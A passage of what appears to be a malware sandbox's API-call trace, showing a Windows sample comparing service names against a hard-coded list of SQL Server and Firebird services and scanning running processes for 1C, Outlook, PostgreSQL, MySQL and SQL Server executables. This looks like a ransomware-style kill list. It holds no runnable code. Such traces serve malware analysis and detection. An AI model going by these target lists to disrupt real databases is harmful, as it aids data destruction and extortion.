lpString2="PcaSvc") returned 1 [0041.938] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0041.938] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0041.938] lstrlenW (lpString="PlugPlay") returned 8 [0041.938] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0041.938] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0041.938] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0041.938] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0041.938] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0041.938] lstrlenW (lpString="Power") returned 5 [0041.938] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0041.938] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0041.938] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0041.938] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0041.938] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0041.938] lstrlenW (lpString="ProfSvc") returned 7 [0041.938] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0041.938] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0041.938] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0041.938] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0041.938] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0041.938] lstrlenW (lpString="RpcEptMapper") returned 12 [0041.938] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0041.938] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0041.938] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0041.938] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0041.938] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0041.938] lstrlenW (lpString="RpcSs") returned 5 [0041.938] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0041.938] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0041.938] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0041.938] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0041.938] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0041.938] lstrlenW (lpString="SamSs") returned 5 [0041.938] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0041.938] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0041.939] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0041.939] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0041.939] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0041.939] lstrlenW (lpString="Schedule") returned 8 [0041.939] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0041.939] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0041.939] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0041.939] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0041.939] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0041.939] lstrlenW (lpString="SENS") returned 4 [0041.939] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0041.939] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0041.939] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0041.939] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0041.939] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0041.939] lstrlenW (lpString="ShellHWDetection") returned 16 [0041.939] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0041.939] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0041.939] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0041.939] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0041.939] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0041.939] lstrlenW (lpString="Spooler") returned 7 [0041.939] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0041.939] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0041.939] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0041.939] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0041.939] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0041.939] lstrlenW (lpString="swprv") returned 5 [0041.939] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0041.939] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0041.939] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0041.939] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0041.939] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0041.939] lstrlenW (lpString="SysMain") returned 7 [0041.939] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0041.939] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0041.939] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0041.940] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0041.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0041.940] lstrlenW (lpString="Themes") returned 6 [0041.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0041.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0041.940] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0041.940] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0041.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0041.940] lstrlenW (lpString="TrkWks") returned 6 [0041.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0041.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0041.940] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0041.940] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0041.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0041.940] lstrlenW (lpString="UxSms") returned 5 [0041.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0041.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0041.940] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0041.940] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0041.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0041.940] lstrlenW (lpString="VSS") returned 3 [0041.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0041.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0041.940] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0041.940] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0041.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0041.940] lstrlenW (lpString="WdiServiceHost") returned 14 [0041.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0041.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0041.940] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0041.940] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0041.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0041.940] lstrlenW (lpString="WdiSystemHost") returned 13 [0041.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0041.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0041.940] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0041.941] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0041.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0041.941] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0041.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0041.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0041.941] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0041.941] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0041.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0041.941] lstrlenW (lpString="Winmgmt") returned 7 [0041.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0041.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0041.941] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0041.941] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0041.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0041.941] lstrlenW (lpString="WPDBusEnum") returned 10 [0041.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0041.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0041.941] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0041.941] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0041.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0041.941] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0041.941] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b4 [0041.943] Process32FirstW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0041.944] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0041.944] lstrlenW (lpString="System") returned 6 [0041.944] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0041.945] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0041.945] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0041.945] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0041.945] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0041.945] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0041.945] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0041.945] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0041.945] lstrlenW (lpString="smss.exe") returned 8 [0041.945] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0041.945] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0041.945] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0041.945] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0041.945] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0041.945] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0041.946] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0041.946] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0041.946] lstrlenW (lpString="csrss.exe") returned 9 [0041.946] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0041.946] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0041.946] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0041.946] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0041.946] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0041.946] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0041.946] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0041.946] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0041.947] lstrlenW (lpString="wininit.exe") returned 11 [0041.947] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0041.947] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0041.947] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0041.947] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0041.948] lstrlenW (lpString="csrss.exe") returned 9 [0041.948] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0041.949] lstrlenW (lpString="winlogon.exe") returned 12 [0041.949] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0041.949] lstrlenW (lpString="services.exe") returned 12 [0041.949] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0041.950] lstrlenW (lpString="lsass.exe") returned 9 [0041.950] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0041.951] lstrlenW (lpString="lsm.exe") returned 7 [0041.951] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.951] lstrlenW (lpString="svchost.exe") returned 11 [0041.951] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.952] lstrlenW (lpString="svchost.exe") returned 11 [0041.952] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.953] lstrlenW (lpString="svchost.exe") returned 11 [0041.953] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.953] lstrlenW (lpString="svchost.exe") returned 11 [0041.953] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.954] lstrlenW (lpString="svchost.exe") returned 11 [0041.954] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0041.955] lstrlenW (lpString="audiodg.exe") returned 11 [0041.955] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.955] lstrlenW (lpString="svchost.exe") returned 11 [0041.955] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.956] lstrlenW (lpString="svchost.exe") returned 11 [0041.956] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0041.957] lstrlenW (lpString="dwm.exe") returned 7 [0041.957] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0041.957] lstrlenW (lpString="explorer.exe") returned 12 [0041.957] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0041.958] lstrlenW (lpString="spoolsv.exe") returned 11 [0041.958] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0041.959] lstrlenW (lpString="taskhost.exe") returned 12 [0041.959] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.959] lstrlenW (lpString="svchost.exe") returned 11 [0041.959] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0041.960] lstrlenW (lpString="taskeng.exe") returned 11 [0041.960] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0041.961] lstrlenW (lpString="taskhost.exe") returned 12 [0041.961] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0041.961] lstrlenW (lpString="carried trinity.exe") returned 19 [0041.961] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0041.962] lstrlenW (lpString="heaven.exe") returned 10 [0041.962] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0041.963] lstrlenW (lpString="dell.exe") returned 8 [0041.963] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0041.963] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0041.964] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0041.964] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0041.964] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0041.965] lstrlenW (lpString="til ear equal.exe") returned 17 [0041.965] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0041.966] lstrlenW (lpString="itunes-bring.exe") returned 16 [0041.966] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0042.091] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0042.091] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0042.097] lstrlenW (lpString="philadelphia.exe") returned 16 [0042.097] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0042.097] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0042.097] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0042.098] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0042.098] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0042.099] lstrlenW (lpString="fraud stuck.exe") returned 15 [0042.099] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0042.099] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0042.099] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, 